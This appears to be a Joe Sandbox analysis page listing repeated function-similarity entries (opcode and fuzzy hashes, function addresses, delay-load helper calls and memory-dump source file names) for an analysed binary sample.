Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 194b1ae0bb1eb3def3ccd786d79ee6add48de2a6bbc8f0da062f95511310a455
Instruction ID: 8761afc80897167efec13a28f9397ed7e796f4d93340b8b85a569c2c074b1dab
Opcode Fuzzy Hash: 194b1ae0bb1eb3def3ccd786d79ee6add48de2a6bbc8f0da062f95511310a455
Instruction Fuzzy Hash: B4B092822581007C230451085902E3A06D8C88AF10360C2EEB438C1080A8408C440432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1ce6fa8a1f18f6d5cab9179f50bd18268ae819761009b5da6dc8c53c93df1032
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 1ce6fa8a1f18f6d5cab9179f50bd18268ae819761009b5da6dc8c53c93df1032
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d180e997f00ccf60fae7bd84d99c4d2438dc9824c3a7ff3193c236a0db35580
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 2d180e997f00ccf60fae7bd84d99c4d2438dc9824c3a7ff3193c236a0db35580
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f0a1e95e0ded1e88db6010335818f16a4003effacdb4c15505ef2d8a5b28b854
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: f0a1e95e0ded1e88db6010335818f16a4003effacdb4c15505ef2d8a5b28b854
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e738b721cb9cd91b3d658dbd3f37ab86f84b25ae930f516d563928955ca55b23
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: e738b721cb9cd91b3d658dbd3f37ab86f84b25ae930f516d563928955ca55b23
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b58bb029d987acc3be76773a9fefada8d8510f52571789807fa46c6a1c37194c
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: b58bb029d987acc3be76773a9fefada8d8510f52571789807fa46c6a1c37194c
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d44703bfcb0f0b73f0d983183fd650487ea941e8d9a05628508eb0bf8f596fa
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 2d44703bfcb0f0b73f0d983183fd650487ea941e8d9a05628508eb0bf8f596fa
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1f65e2966ae7df037531875f71415d9a2aa04bae2f635d2cd7c42dc916e3b85b
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 1f65e2966ae7df037531875f71415d9a2aa04bae2f635d2cd7c42dc916e3b85b
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb5a15a9909b1ac1169dc2945c3f4bb5e9113817baf7b1bcd51f5f4b4fc50b65
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: fb5a15a9909b1ac1169dc2945c3f4bb5e9113817baf7b1bcd51f5f4b4fc50b65
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 092d052d9b0d426c97bccac64f3780a61e3b22fe513601a41581e55e16192639
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 092d052d9b0d426c97bccac64f3780a61e3b22fe513601a41581e55e16192639
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 905e5278b59bda169530b999dc6b60d9c58b19e2c29a0da080d9dcd50e7cf6f7
Instruction ID: 65ae28f527d331626714cbdd0926b49970e2ecf1917bfe691e1eacddbad36ac6
Opcode Fuzzy Hash: 905e5278b59bda169530b999dc6b60d9c58b19e2c29a0da080d9dcd50e7cf6f7
Instruction Fuzzy Hash: DEA011E22A8002BC3208A2022C03C3B0A8CC8C8B20330C8FEF83AC0880A880A8002832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f08f281e3810221f34e463344079a7365ead5f4e3da2729b298dc61d967d3d15
Instruction ID: af49a33b8af7e853e42c86cd8b83f2a7fe3a1ff82d2e12b871e1a080423f3cfb
Opcode Fuzzy Hash: f08f281e3810221f34e463344079a7365ead5f4e3da2729b298dc61d967d3d15
Instruction Fuzzy Hash: A1A011E22A80023C3208A2022C02C3B02ACC8CAB20330C0EEF838AA080AC8088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16f8e4af7fa5eae8661fa6c533df917f7abefcad86f19c284034685c14066e7c
Instruction ID: b84ae5ce1a40e189d67f99545aac3dcac7c0c8b667399bc77f055d15fa696a67
Opcode Fuzzy Hash: 16f8e4af7fa5eae8661fa6c533df917f7abefcad86f19c284034685c14066e7c
Instruction Fuzzy Hash: 77A011E22A8002BC3208A2022C02C3B02ACC8CAB20330C8EEF83A8A080A88088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 731504d39a4b7e77b754f5c2d44492a22ae37f57c1b336f71a0430e782b47810
Instruction ID: b84ae5ce1a40e189d67f99545aac3dcac7c0c8b667399bc77f055d15fa696a67
Opcode Fuzzy Hash: 731504d39a4b7e77b754f5c2d44492a22ae37f57c1b336f71a0430e782b47810
Instruction Fuzzy Hash: 77A011E22A8002BC3208A2022C02C3B02ACC8CAB20330C8EEF83A8A080A88088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51e88ad2780dcbbd64782c247b6875945828796426d46b761c3530883dba39c8
Instruction ID: b84ae5ce1a40e189d67f99545aac3dcac7c0c8b667399bc77f055d15fa696a67
Opcode Fuzzy Hash: 51e88ad2780dcbbd64782c247b6875945828796426d46b761c3530883dba39c8
Instruction Fuzzy Hash: 77A011E22A8002BC3208A2022C02C3B02ACC8CAB20330C8EEF83A8A080A88088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0f3c7fbf2971d8d748a5cb66fef53b68f85eb326dd602f5042eeb54ba3363a9d
Instruction ID: b84ae5ce1a40e189d67f99545aac3dcac7c0c8b667399bc77f055d15fa696a67
Opcode Fuzzy Hash: 0f3c7fbf2971d8d748a5cb66fef53b68f85eb326dd602f5042eeb54ba3363a9d
Instruction Fuzzy Hash: 77A011E22A8002BC3208A2022C02C3B02ACC8CAB20330C8EEF83A8A080A88088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb91ef932d9f27f48a46d7572397d10516eed49c1aaedf30ac6a450b2e0815ea
